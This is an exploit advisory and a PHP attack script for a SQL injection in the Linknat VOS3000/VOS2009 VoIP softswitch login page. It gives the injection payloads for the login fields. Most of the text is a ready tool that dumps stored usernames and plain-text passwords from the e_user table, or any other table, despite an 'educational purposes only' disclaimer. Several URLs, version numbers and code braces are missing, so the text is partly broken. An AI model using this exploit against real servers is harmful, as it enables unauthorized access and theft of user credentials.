A SQL injection was found in Linknat VOS3000/VOS2009, a popular VoIP
softswitch, that could allow remote attackers to gain access to the
credentials stored in plain-text.
Application: Linknat VOS3000/VOS2009
Versions Affected:,,
Vendor URL: http:
Bug: SQLi (with DBA privileges)
Type: Remote
Resolution: Fixed, upgrade to
Reference: WooYun-2015-145458 -
The SQLi reported is time-based blind. Since it is not an in-band SQLi, the
results can be gathered from the output of welcome.jsp during the same
(1st request)
POST http:
PARAM loginType=1
name= ' union select 1,2,@@version,' hello',5,6#
pass= ' OR ' '='
(2nd request during the same session)
GET http:
RESULT 0|' union select
1,2,@@version, 'hello' ,5,6#|1|5.0.51a-community|hello|0.00|0.00|
# Linknat VOS2009/VOS3000 SQLi exploit
# DISCLAIMER: The exploit is to be used for educational purposes only
# The author would not be responsible for any misuse
# AUTHOR: Osama Khalid
# WEBSITE: http:
# DATE : 19/05/2016
# REF: http:
if ( $argc < 2) {
exit ;
$host = $argv [1];
$column_one = isset( $argv [2]) ? $argv [2] : "loginname" ;
$column_two = isset( $argv [3]) ? $argv [3] : "password" ;
$table = isset( $argv [4]) ? $argv [4] : "e_user" ;
$other = isset( $argv [5]) ? $argv [5] : "" ;
function banner() {
echo "########################################\n" ;
echo "# #\n" ;
echo "# Linknat VOS3000/VOS2009 SQLi exploit #\n" ;
echo "# #\n" ;
echo "# Osama Khalid #\n" ;
echo "########### codinghazard.com ###########\n" ;
function usage() {
echo "\n" ;
echo "php vos3000.php [HOST]\n" ;
echo "php vos3000.php\n" ;
echo "php vos3000.php [HOST] [COL1] [COL2] [TABLE] [OTHER SQL]\n" ;
echo "php vos3000.php table_schema table_name
information_schema.tables \"where table_schema = 'mysql' \"
function curl( $url , $post = array (), $cookies = null, $header = false) {
$curl = curl_init();
curl_setopt( $curl , CURLOPT_URL, $url );
curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, false);
curl_setopt( $curl , CURLOPT_HEADER, $header );
curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
if ( $cookies != null)
curl_setopt( $curl , CURLOPT_COOKIE, $cookies );
if ( count ( $post ) > 0) {
foreach ( $post as $key => $value )
$post_items [] = $key . '=' . urlencode( $value );
$post_string = implode( '&' , $post_items );
curl_setopt( $curl , CURLOPT_POST, 1);
curl_setopt( $curl , CURLOPT_POSTFIELDS, $post_string );
$data = curl_exec( $curl );
curl_close( $curl );
return $data ;
function query( $host , $query ) {
$data = curl( "http://$host/eng/login.jsp" , array (
"loginType" => 1,
"name" => "' union " . $query . "#" ,
"pass" => "' OR ''='"
), null, true);
preg_match_all( '|Set-Cookie: (.*);|U' , $data , $matches );
$cookies = implode( '; ' , $matches [1]);
$data = curl( "http://$host/eng/welcome.jsp" , array (), $cookies , false);
$parts = explode ( "|" , trim( $data ));
if ( count ( $parts ) < 7)
return false;
return array ( $parts [3], $parts [4]);
function ascii_table( $data ) {
$keys = array_keys ( end ( $data ));
$wid = array_map ( 'strlen' , $keys );
foreach ( $data as $row ) {
foreach ( array_values ( $row ) as $k => $v )
$wid [ $k ] = max( $wid [ $k ], strlen ( $v ));
foreach ( $wid as $k => $v ) {
$fmt [ $k ] = "%-{$v}s" ;
$sep [ $k ] = str_repeat ( '-' , $v );
$fmt = '| ' . implode( ' | ' , $fmt ) . ' |' ;
$sep = '+-' . implode( '-+-' , $sep ) . '-+' ;
$buf = array ( $sep , vsprintf( $fmt , $keys ), $sep );
foreach ( $data as $row ) {
$buf [] = vsprintf( $fmt , $row );
$buf [] = $sep ;
return implode( "\n" , $buf );
echo "\n" ;
echo "Target: $host\n" ;
echo "Column #1: $column_one\n" ;
echo "Column #2: $column_two\n" ;
echo "Table: $table\n" ;
echo "Other: $other\n" ;
echo "\n" ;
$results = array ();
$count_result = query( $host , "SELECT 1,2, COUNT (*),4,5,6 FROM $table
$other ");
if ( $count_result ) {
$count = intval ( $count_result [0]);
echo "Found $count rows...\n" ;
for ( $i =0; $i < $count ; $i ++) {
$q = "SELECT 1,2,HEX( $column_one ),HEX( $column_two ),5,6 FROM $table
$other LIMIT " . $i . " ,1";
$result = query( $host , $q );
if ( $result ) {
echo "R" . ( $i +1) . "]\t" . $column_one . " = " .
hex2bin( $result [0]) . ", " . $column_two . " = " . hex2bin( $result [1]) .
"\n" ;
} else {
echo "Error retrieving row " . ( $i +1) . "\n" ;
$results [] = array ( $column_one => hex2bin( $result [0]), $column_two
=> hex2bin( $result [1]));
if ( count ( $results ) > 0) {
echo "\n\n" . ascii_table( $results ) . "\n" ;
} else {
echo "Error retrieving row count" ;
-- Osama Khalid